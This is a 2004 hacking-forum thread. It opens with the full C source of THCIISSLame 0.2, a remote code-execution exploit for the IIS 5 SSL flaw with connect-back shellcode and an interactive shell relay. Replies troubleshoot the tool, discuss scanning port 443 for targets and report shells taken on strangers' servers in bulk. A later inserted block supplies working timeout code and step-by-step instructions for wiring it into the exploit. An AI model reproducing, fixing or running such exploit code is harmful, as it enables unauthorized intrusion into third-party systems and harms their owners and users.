Full Version: Iis5 Ssl V0.2
andydis
Apr 22 2004, 10:43 PM
You know what this does by now; strangely enough I had no luck with it myself...
Also, does anybody out there know how to make it bind to a different port? Would I have to change the shellcode? Because what I did when the WebDAV sploit was out was bind the shellcode to port 80 and quickly set up another way in, but I suppose now that this has connect-back shellcode it'll go straight through firewalls with any luck (I'm talking about NAT and port blocks) :-) Well, I have been down the pub :-) U get me? lol
| CODE |
/*****************************************************************************/
/* THCIISSLame 0.2 - IIS 5 SSL remote root exploit                           */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                         */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                           */
/* Bug was found by Internet Security Systems                                */
/* Reversing credits of the bug go to Halvar Flake                           */
/*                                                                           */
/* compile with MS Visual C++ : cl THCIISSLame.c                             */
/*                                                                           */
/* This little update uses a connectback shell !                             */
/*                                                                           */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak,  */
/* scut, stealth, FtR and Random                                             */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>          /* read()/write() on the console handles in shell() */
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

/* jmp short +15: hops over the 11 filler bytes and the 4-byte return address
   straight into the shellcode that follows them */
#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"   /* "THCOWNZIIS!" */

/* 17-byte SSL handshake record that triggers the overflow */
char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

/* connectback shellcode (292 bytes). Bytes 2-3 hold the port and bytes 4-7
   the IP, both in network order; they are patched at runtime from argv
   (defaults: 31337 / 127.0.0.1). */
char shellcode[] =
"\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53"
"\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30"
"\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55"
"\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65"
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57"
"\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88"
"\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff"
"\x55\xf0\x6a\xff\xff\x55\xe4";

void usage(void);
void shell(SOCKET sock);

int main(int argc, char *argv[])
{
    SOCKET sock, sock2, sock3;
    int rc, len = sizeof(struct sockaddr_in);
    unsigned long addr = INADDR_NONE;
    unsigned char *badbuf, *p;
    unsigned long offset = 0x6741a1cd;   /* return address, kept XOR-masked in the source */
    unsigned long XOR = 0xffffffff;
    unsigned short cbport;
    unsigned long cbip;
    struct sockaddr_in mytcp;
    struct hostent *hp;
    WSADATA wsaData;

    printf("\nTHCIISSLame v0.2 - IIS 5.0 SSL remote root exploit\n");
    printf("tested on Windows 2000 Server german/english SP4\n");
    printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

    if (argc != 4)
        usage();

    badbuf = malloc(327);
    if (!badbuf) {
        printf("malloc() failed\n");
        exit(-1);
    }
    memset(badbuf, 0, 327);

    printf("\n[*] building buffer\n");

    /* layout: sslshit (17) | jumper (2) | greetings (11) | ret addr (4) | shellcode (292) = 326 bytes */
    p = badbuf;
    memcpy(p, sslshit, sizeof(sslshit));
    p += sizeof(sslshit) - 1;
    strcat(p, jumper);
    strcat(p, greetings_to_microsoft);

    offset ^= XOR;                       /* unmask the return address before appending it */
    strncat(p, (char *)&offset, 4);

    /* Patch connectback port/IP into the shellcode. The buffer is assembled
       with strcat(), so a port below 256 or an IP with a zero octet (e.g.
       10.0.x.x) puts a 0x00 into the payload and truncates it. */
    cbport = htons((unsigned short)atoi(argv[3]));
    cbip = inet_addr(argv[2]);
    memcpy(&shellcode[2], &cbport, 2);
    memcpy(&shellcode[4], &cbip, 4);
    strcat(p, shellcode);

    if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0) {
        printf("WSAStartup failed !\n");
        exit(-1);
    }

    hp = gethostbyname(argv[1]);
    if (!hp)
        addr = inet_addr(argv[1]);
    if (!hp && addr == INADDR_NONE) {
        printf("Unable to resolve %s\n", argv[1]);
        exit(-1);
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("socket() error...\n");
        exit(-1);
    }

    memset(&mytcp, 0, sizeof(mytcp));
    if (hp) {
        memcpy(&mytcp.sin_addr, hp->h_addr, hp->h_length);
        mytcp.sin_family = hp->h_addrtype;
    } else {
        mytcp.sin_addr.s_addr = addr;
        mytcp.sin_family = AF_INET;
    }
    mytcp.sin_port = htons(443);

    printf("[*] connecting the target\n");
    rc = connect(sock, (struct sockaddr *)&mytcp, sizeof(struct sockaddr_in));
    if (rc != 0) {
        printf("\nCan't connect to ssl port 443!\n");
        exit(-1);
    }

    send(sock, badbuf, 326, 0);
    printf("[*] exploit send\n");
    Sleep(500);

    /* Listener for the connectback on 0.0.0.0:<connectback port>. It is bound
       only after the packet went out, so anything else (netcat) already on
       that port produces "bind error", and accept() below has no timeout:
       a patched target leaves the tool waiting forever. */
    mytcp.sin_addr.s_addr = INADDR_ANY;
    mytcp.sin_port = htons((unsigned short)atoi(argv[3]));

    sock2 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    rc = bind(sock2, (struct sockaddr *)&mytcp, sizeof(struct sockaddr_in));
    if (rc != 0) {
        printf("bind error() %d\n", WSAGetLastError());
        exit(-1);
    }
    rc = listen(sock2, 1);
    if (rc != 0) {
        printf("listen error()\n");
        exit(-1);
    }

    printf("[*] waiting for shell\n");
    sock3 = accept(sock2, (struct sockaddr *)&mytcp, &len);
    if (sock3 != INVALID_SOCKET) {
        printf("[*] Exploit successful ! Have fun !\n");
        printf("[*] --------------------------------------------------------------------\n\n");
        shell(sock3);
        shutdown(sock3, SD_BOTH);
        closesocket(sock3);
    }

    shutdown(sock, SD_BOTH);
    closesocket(sock);
    closesocket(sock2);
    free(badbuf);
    WSACleanup();
    exit(0);
}

void usage(void)
{
    printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
    printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
    exit(0);
}

/* Console relay. Winsock select() cannot watch stdin, so the loop polls the
   socket for one second and, if nothing arrived, blocks on stdin for the
   next command to send. */
void shell(SOCKET sock)
{
    int l;
    char buf[1024];
    struct timeval time;
    fd_set fds;

    while (1) {
        FD_ZERO(&fds);
        FD_SET(sock, &fds);
        time.tv_sec = 1;
        time.tv_usec = 0;

        l = select(0, &fds, NULL, NULL, &time);
        if (l == 1) {
            l = recv(sock, buf, sizeof(buf), 0);
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
            l = write(1, buf, l);
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
        } else {
            l = read(0, buf, sizeof(buf));
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
            l = send(sock, buf, l, 0);
            if (l <= 0) {
                printf("bye bye...\n");
                return;
            }
        }
    }
}
|
brOmstar
Apr 22 2004, 10:47 PM
Try to read the forum... this version (with reverse shellcode) was posted before, and an explanation of changing the bind port is also available.
andydis
Apr 22 2004, 11:25 PM
Gee, sorry bromstar, must have missed that post :-)
Flowers
Apr 22 2004, 11:49 PM
Nice exploit
manureds
Apr 23 2004, 12:23 AM
Thanx m8, gonna try this. Cheers, thanx a lot m8.
blahplok
Apr 23 2004, 03:54 AM
Thanks... nice exploit...
bnhc
Apr 23 2004, 04:08 AM
thanks....nice...
realloader
Apr 23 2004, 04:09 AM
Thank you for the binary... I tried to compile it, with no success.
sfzhi
Apr 23 2004, 04:28 AM
Very nice exploit!! Anybody have a Chinese version?
bnhc
Apr 23 2004, 04:44 AM
| QUOTE (sfzhi @ Apr 23 2004, 04:28 AM) | Very nice exploit!! Anybody have a Chinese version? |
Chinese version?? You mean a Chinese version of that exploit?
decline
Apr 23 2004, 05:37 AM
Thanks for the post, keep it up.
sfzhi
Apr 23 2004, 09:19 AM
| QUOTE (bnhc @ Apr 23 2004, 04:44 AM) | | QUOTE (sfzhi @ Apr 23 2004, 04:28 AM) | Very nice exploit!! Anybody have a Chinese version? |
Chinese version?? You mean a Chinese version of that exploit? |
Yes, because I am Chinese. Sorry for my poor English.
G777
Apr 23 2004, 10:29 AM
I tested this last night and the damn thing wouldn't work. It compiled OK, but every time I run the exploit it just hangs on the 1st IP. I also tried JC's pre-compiled version and the same thing happens. I guess I should probably have tested it before I made the GUI. Anyone else having probs with this?
realloader
Apr 23 2004, 10:35 AM
If you don't mind, how to scan for this exploit? Thank you in advance!
Killaloop
Apr 23 2004, 10:42 AM
| QUOTE (G777 @ Apr 23 2004, 10:29 AM) | I tested this last night and the damn thing wouldn't work. It compiled OK, but every time I run the exploit it just hangs on the 1st IP. I also tried JC's pre-compiled version and the same thing happens. I guess I should probably have tested it before I made the GUI. Anyone else having probs with this? |
Take a look at this code:
| CODE |
printf("[*] waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
  printf("[*] Exploit successful ! Have fun !\n");
  printf("[*] --------------------------------------------------------------------\n\n");
  shell(sock3);
}
}
else
{
  printf("\nCan't connect to ssl port 443!\n");
  exit(-1);
}
|
No timeout, meaning it waits forever for the shell once it could connect to port 443. So if the target is already patched, it will just sit there and wait for the shell, which will never come.
Roby
Apr 23 2004, 10:46 AM
| QUOTE (realloader @ Apr 23 2004, 01:35 PM) | If you don't mind, how to scan for this exploit? Thank you in advance! |
Come on dude, if you can't figure it out then you don't deserve to use this exploit or any exploit. It's obvious that you need to scan for ports that IIS listens on. Go and figure out on your own which two ports can be scanned for this exploit.
DCLXVI
Apr 23 2004, 10:47 AM
| QUOTE (G777 @ Apr 23 2004, 10:29 AM) | I tested this last night and the damn thing wouldn't work. It compiled OK, but every time I run the exploit it just hangs on the 1st IP. I also tried JC's pre-compiled version and the same thing happens. I guess I should probably have tested it before I made the GUI. Anyone else having probs with this? |
I had the same problem. I set netcat to listen on my selected port and it no longer hangs, but it does give a BIND ERROR. Ignore the bind error and you will eventually get a shell with netcat if you find a vulnerable target, and vulnerable ones are not that easy to find. Hope this helps.
Killaloop
Apr 23 2004, 10:51 AM
| QUOTE (DCLXVI @ Apr 23 2004, 10:47 AM) | | QUOTE (G777 @ Apr 23 2004, 10:29 AM) | I tested this last night and the damn thing wouldn't work. It compiled OK, but every time I run the exploit it just hangs on the 1st IP. I also tried JC's pre-compiled version and the same thing happens. I guess I should probably have tested it before I made the GUI. Anyone else having probs with this? |
I had the same problem. I set netcat to listen on my selected port and it no longer hangs, but it does give a BIND ERROR. Ignore the bind error and you will eventually get a shell with netcat if you find a vulnerable target, and vulnerable ones are not that easy to find. Hope this helps. |
No, you get the bind error because you have netcat listening on the port the exploit tries to bind the shell to. You have to edit the source of this exploit to get it working right. If you have netcat running on the port you try to bind, you will maybe have one result, but while you've got that one result in the shell and try to exploit others, you will lose some vulnerable servers. To fix the problems, read up one post from me to see where the problem is.
binary_hashes
Apr 23 2004, 10:51 AM
What do we have to type in for connect-back IP and connect-back port? HELP
Killaloop
Apr 23 2004, 10:54 AM
| QUOTE (binary_hashes @ Apr 23 2004, 10:51 AM) | What do we have to type in for connect-back IP and connect-back port? HELP |
Where are all you people coming from again?? Unbelievable. What about your IP address and the port where you want it to bind the shell to?
Roby
Apr 23 2004, 11:15 AM
| QUOTE (Killaloop @ Apr 23 2004, 01:51 PM) | No, you get the bind error because you have netcat listening on the port the exploit tries to bind the shell to. You have to edit the source of this exploit to get it working right. If you have netcat running on the port you try to bind, you will maybe have one result, but while you've got that one result in the shell and try to exploit others, you will lose some vulnerable servers. To fix the problems, read up one post from me to see where the problem is. |
I don't think I understand what you're saying.. Isn't that the idea of a connect-back shell? You set up netcat to listen on a port and exploit the target so it connects back to the port netcat listens on? So I don't get what that bind error is all about. And about editing the exploit: I think trial members can't see the thread about editing the exploit. Or at least I can't seem to find it. Maybe someone could point me in the right direction? Greetz, Roby
DCLXVI
Apr 23 2004, 11:41 AM
| QUOTE (Killaloop @ Apr 23 2004, 10:51 AM) | No, you get the bind error because you have netcat listening on the port the exploit tries to bind the shell to. You have to edit the source of this exploit to get it working right. If you have netcat running on the port you try to bind, you will maybe have one result, but while you've got that one result in the shell and try to exploit others, you will lose some vulnerable servers. To fix the problems, read up one post from me to see where the problem is. |
Killaloop, once you get a shell in netcat, the exploit just hangs again, so you don't lose any vulnerable servers. You can also open as many netcat windows as you want; I tested it with some I knew to be vulnerable and got three shells in one go.
-=@cIdBuRn=-
Apr 23 2004, 01:06 PM
Thanx for the nice exploit, but which scanner to use for this??
Killaloop
Apr 23 2004, 01:13 PM
| QUOTE (DCLXVI @ Apr 23 2004, 11:41 AM) | Killaloop, once you get a shell in netcat, the exploit just hangs again, so you don't lose any vulnerable servers. You can also open as many netcat windows as you want; I tested it with some I knew to be vulnerable and got three shells in one go. |
No, it doesn't hang, it exits because of the bind error. Big difference.
@Roby The reverse-shell exploit has a listener built into it; it doesn't need netcat listening. That's the reason for the bind error... netcat listens on the port where the exploit wants to get the shell. Ignore the bind error or close netcat.
misa
Apr 23 2004, 01:20 PM
| QUOTE (-=@cIdBuRn=- @ Apr 23 2004, 01:06 PM) | Thanx for the nice exploit, but which scanner to use for this?? |
scan1000 or whatever
Anarchiste
Apr 23 2004, 02:02 PM
Excuse me, but I am behind a router and I can't use the connect-back exploit because the router rejects the connections, so do you have the first version with the bind-shell exploit, please? Or, if you know how to make the router accept the connections, I am listening ^^
realloader
Apr 23 2004, 02:03 PM
No... I cannot scan with scan1000. Here, see it:
| CODE |
Usage: scan1000 <Option> <Parameter>

<Option>:
  -p <Port|Port-Port> <IP|IP-IP>           Scan port
  -cgi <IP address>                        Scan cgi hole
  -idq <Start IP> <End IP>                 Scan .idq hole
  -pri <Start IP> <End IP>                 Scan .printer hole
  -apache <Start IP> <End IP>              Scan Apache 1.3.x
  -apache2 <Start IP> <End IP>             Scan Apache 2.x
  -apachechunked <Start IP> <End IP>       Scan Apache Win32 Chunked
  -uni <Start IP> <End IP>                 Scan unicode hole
  -webdav <Start IP> <End IP>              Scan Webdav hole
  -media <Start IP> <End IP>               Scan IIS Media Services
  -codered <Start IP> <End IP>             Scan codered virus host
  -ftp <Start IP> <End IP> [-admin]
  -um <IP addr> [Web path] <Message>       Modify web files

Example: scan1000 -webdav 192.168.0.1 192.168.0.255

-Credits DOH?
|
misa
Apr 23 2004, 02:23 PM
stupid...
| QUOTE |
No... I cannot scan with scan1000. Here, see it:
Usage: scan1000 <Option> <Parameter>

<Option>:
  -p <Port|Port-Port> <IP|IP-IP>           Scan port
  -cgi <IP address>                        Scan cgi hole
  -idq <Start IP> <End IP>                 Scan .idq hole
  -pri <Start IP> <End IP>                 Scan .printer hole
  -apache <Start IP> <End IP>              Scan Apache 1.3.x
  -apache2 <Start IP> <End IP>             Scan Apache 2.x
  -apachechunked <Start IP> <End IP>       Scan Apache Win32 Chunked
  -uni <Start IP> <End IP>                 Scan unicode hole
  -webdav <Start IP> <End IP>              Scan Webdav hole
  -media <Start IP> <End IP>               Scan IIS Media Services
  -codered <Start IP> <End IP>             Scan codered virus host
  -ftp <Start IP> <End IP> [-admin]
  -um <IP addr> [Web path] <Message>       Modify web files

Example: scan1000 -webdav 192.168.0.1 192.168.0.255

-Credits DOH?
|
Demsta
Apr 23 2004, 02:32 PM
lol.. I think you need another board cleanup.
no1
Apr 23 2004, 03:38 PM
Cool, thx 4 the prog.
Unio
Apr 23 2004, 04:13 PM
| CODE |
No... I cannot scan with scan1000. Here, see it:
Usage: scan1000 <Option> <Parameter>

<Option>:
  -p <Port|Port-Port> <IP|IP-IP>           Scan port
  -cgi <IP address>                        Scan cgi hole
  -idq <Start IP> <End IP>                 Scan .idq hole
  -pri <Start IP> <End IP>                 Scan .printer hole
  -apache <Start IP> <End IP>              Scan Apache 1.3.x
  -apache2 <Start IP> <End IP>             Scan Apache 2.x
  -apachechunked <Start IP> <End IP>       Scan Apache Win32 Chunked
  -uni <Start IP> <End IP>                 Scan unicode hole
  -webdav <Start IP> <End IP>              Scan Webdav hole
  -media <Start IP> <End IP>               Scan IIS Media Services
  -codered <Start IP> <End IP>             Scan codered virus host
  -ftp <Start IP> <End IP> [-admin]
  -um <IP addr> [Web path] <Message>       Modify web files

Example: scan1000 -webdav 192.168.0.1 192.168.0.255
|
LOL, you have to scan port 443. By the way, great work andydis.
Roby
Apr 23 2004, 04:38 PM
| QUOTE (Anarchiste @ Apr 23 2004, 05:02 PM) | Excuse me, but I am behind a router and I can't use the connect-back exploit because the router rejects the connections, so do you have the first version with the bind-shell exploit, please? Or, if you know how to make the router accept the connections, I am listening ^^ |
That is why god created google, my friend: hxxp://www.security-protocols.com/modules.php?name=News&file=article&sid=1885
Roby
misa
Apr 23 2004, 04:43 PM
| QUOTE (Demsta @ Apr 23 2004, 02:32 PM) | lol.. I think you need another board cleanup. |
Talking about me or the person I commented on?
thyr0x1ne
Apr 23 2004, 06:05 PM
Sure, it works pretty nice;
Nice IPs & nice domains; by the way, a lot of them are protected/firewalled or LAN IPs... for the 20 shells I got in the last hour, I was not able to launch or infiltrate anywhere due to Antivir/FW; and as I don't want to crash anything!
Good luck dudes
Anarchiste
Apr 23 2004, 06:08 PM
Thx Roby, I had already found it with google, but thx.
misa
Apr 23 2004, 06:53 PM
Anyone really managed to get a shell with this? How big is the chance? I tried with the autohacker on 6500 IPs and I got 0 shells... (filtered)
dEuS
Apr 23 2004, 07:01 PM
ThX man!
Now we can exploit such a server... but how do we secure it?
Any ideas?
We can stop IIS/SSL, but I think the admin notices this?! What do you think about it?
cya
strohunter
Apr 23 2004, 07:15 PM
Has Microsoft released a patch for this yet?
dEuS
Apr 23 2004, 07:17 PM
Yes, they released a patch today... but you can't install it with only a shell. ciao
G777
Apr 23 2004, 07:42 PM
| QUOTE (Killaloop @ Apr 23 2004, 10:42 AM) | | QUOTE (G777 @ Apr 23 2004, 10:29 AM) | I tested this last night and the damn thing wouldn't work. It compiled OK, but every time I run the exploit it just hangs on the 1st IP. I also tried JC's pre-compiled version and the same thing happens. I guess I should probably have tested it before I made the GUI. Anyone else having probs with this? |
Take a look at this code:
| CODE |
printf("[*] waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
  printf("[*] Exploit successful ! Have fun !\n");
  printf("[*] --------------------------------------------------------------------\n\n");
  shell(sock3);
}
}
else
{
  printf("\nCan't connect to ssl port 443!\n");
  exit(-1);
}
|
No timeout, meaning it waits forever for the shell once it could connect to port 443. So if the target is already patched, it will just sit there and wait for the shell, which will never come.
|
Thanx for the tip m8
SeNe
Apr 23 2004, 10:54 PM
You can download the patch from here: PATCH ME. And yes, you can patch from CMD; just google a bit and you will find the answer.
cougar
Apr 23 2004, 11:22 PM
Thnx for the patch m8
jimmy
Apr 24 2004, 02:14 AM
Make some bat with: patch.exe /quiet /forcerestart /o /n /f. That will do the job if you use the correct patch for the correct OS.
Then second, autohacker with 0.2 won't work because, indeed, there is no timeout built in. If you know some C you can easily add a timeout like I did:
| CODE |
THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit appears to have failed!
|
That's what mine does now, really comes in handy. BTW, exploit version 0.2 is definitely better than 0.1.
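The fix Killaloop and jimmy describe above (and the bind-error confusion that runs through the thread), as an added example that is not part of the thread or of THC's code: a connect-back listener that binds the port before the exploit packet is sent and gives accept() a deadline via select(), so a patched or outbound-filtered target produces "Exploit appears to have failed!" instead of hanging forever. It is written against POSIX sockets so it compiles on Linux/BSD; to drop it into THCIISSLame.c on Windows the same select() logic works over Winsock after WSAStartup() (SOCKET instead of int, closesocket() instead of close()). The function names, the return codes, and the loopback self-checks are this example's own assumptions, not anything from the original exploit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

enum { CB_TIMEOUT = -2, CB_ERROR = -1 };   /* assumed return codes */

/* Bind and listen on bind_ip:port *before* the exploit packet goes out
 * (port 0 = ephemeral; the port actually bound is stored in *bound).
 * Nothing else, netcat included, may sit on that port or bind() fails:
 * that is the "bind error" the thread keeps running into. */
int cb_listen(const char *bind_ip, unsigned short port, unsigned short *bound)
{
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    int ls = socket(AF_INET, SOCK_STREAM, 0);
    if (ls < 0)
        return CB_ERROR;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, bind_ip, &sa.sin_addr) != 1 ||
        bind(ls, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(ls, 1) < 0) {
        close(ls);
        return CB_ERROR;
    }
    if (bound && getsockname(ls, (struct sockaddr *)&sa, &len) == 0)
        *bound = ntohs(sa.sin_port);
    return ls;
}

/* Replacement for the bare accept(): wait at most timeout_sec for the
 * connect-back. Returns the shell's fd, CB_TIMEOUT if nothing arrived
 * (target patched, outbound filtered, exploit failed), CB_ERROR otherwise. */
int cb_wait_for_shell(int ls, int timeout_sec)
{
    fd_set rd;
    struct timeval tv = { timeout_sec, 0 };
    FD_ZERO(&rd);
    FD_SET(ls, &rd);
    int rc = select(ls + 1, &rd, NULL, NULL, &tv);
    if (rc == 0)
        return CB_TIMEOUT;
    if (rc < 0)
        return CB_ERROR;
    int s = accept(ls, NULL, NULL);
    return s < 0 ? CB_ERROR : s;
}

/* Constructed self-checks over loopback; no target involved. */
int selftest_timeout(void)
{
    int ls = cb_listen("127.0.0.1", 0, NULL);
    if (ls < 0)
        return 0;
    int r = cb_wait_for_shell(ls, 1);        /* nobody connects: must time out */
    close(ls);
    return r == CB_TIMEOUT;
}

int selftest_callback(void)
{
    unsigned short port = 0;
    struct sockaddr_in sa;
    char buf[8] = { 0 };
    int ok = 0, s;
    int ls = cb_listen("127.0.0.1", 0, &port);
    int c = socket(AF_INET, SOCK_STREAM, 0);
    if (ls < 0 || c < 0)
        return 0;
    /* play the shell's part: connect back to the listener ourselves */
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(port);
    if (connect(c, (struct sockaddr *)&sa, sizeof sa) == 0 &&
        (s = cb_wait_for_shell(ls, 5)) >= 0) {
        send(c, "ok\n", 3, 0);
        ok = recv(s, buf, sizeof buf - 1, 0) == 3 && strcmp(buf, "ok\n") == 0;
        close(s);
    }
    close(c);
    close(ls);
    return ok;
}

int main(void)
{
    printf("timeout path:  %s\n", selftest_timeout() ? "ok" : "FAIL");
    printf("callback path: %s\n", selftest_callback() ? "ok" : "FAIL");
    return 0;
}
```

To wire it into the exploit: call cb_listen() with the connect-back port before the send() of badbuf, replace the accept() with cb_wait_for_shell(sock2, 30), and on CB_TIMEOUT print the failure line and move on to the next host; on success hand the returned socket to the existing shell() relay. Because the exploit now owns the port itself, no netcat listener is needed, and starting one only reproduces the bind error.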
Erra
Apr 24 2004, 03:00 AM
Works fine for me, apart from the fact that every shell I have managed to get hasn't allowed me to execute any code...... really not sure why. I am testing on a mate's machine because I don't have Win2k? Maybe it's a setup thing, I don't know. Back to the drawing board for me. It's very cool though anyway.
Loxy
Apr 24 2004, 07:21 AM
What port(s) and such are you guys using? I always get a Bind Error. : (
Anarchiste
Apr 24 2004, 09:45 AM
You have a bind error because you have set netcat or another program on the connect-back shell port. You don't need netcat; there is a socket in the exploit that already listens on the port and gives you the shell. Good luck.
arn0ld
Apr 24 2004, 10:01 AM
I don't have any of these problems with v0.1 (never got a shell with it...)
misa
Apr 24 2004, 10:25 AM
Never got a shell with it either.
Loxy
Apr 24 2004, 10:56 AM
K, got some shells now, ty. ; )
rvd
Apr 24 2004, 11:45 AM
I have checked some machines now but never got a shell. When I exec the prog, it says:
| CODE |
[*] Building buffer
[*] Connecting to target
[*] Exploit send
[*] Waiting for shell
|
I first scanned on port 443; after that I did a banner scan on port 80 at the IPs from the port scan. I did this with Scanline (sl -bhpt 80 -f in.txt -o checked.txt). Then I checked the output for Microsoft-IIS/5.0. Anyone know if I could also listen with netcat on my selected port? Because if you do, you get the bind error like some of you already experienced. Can you ignore this error and just let netcat do the listening? Can anyone give me a solution?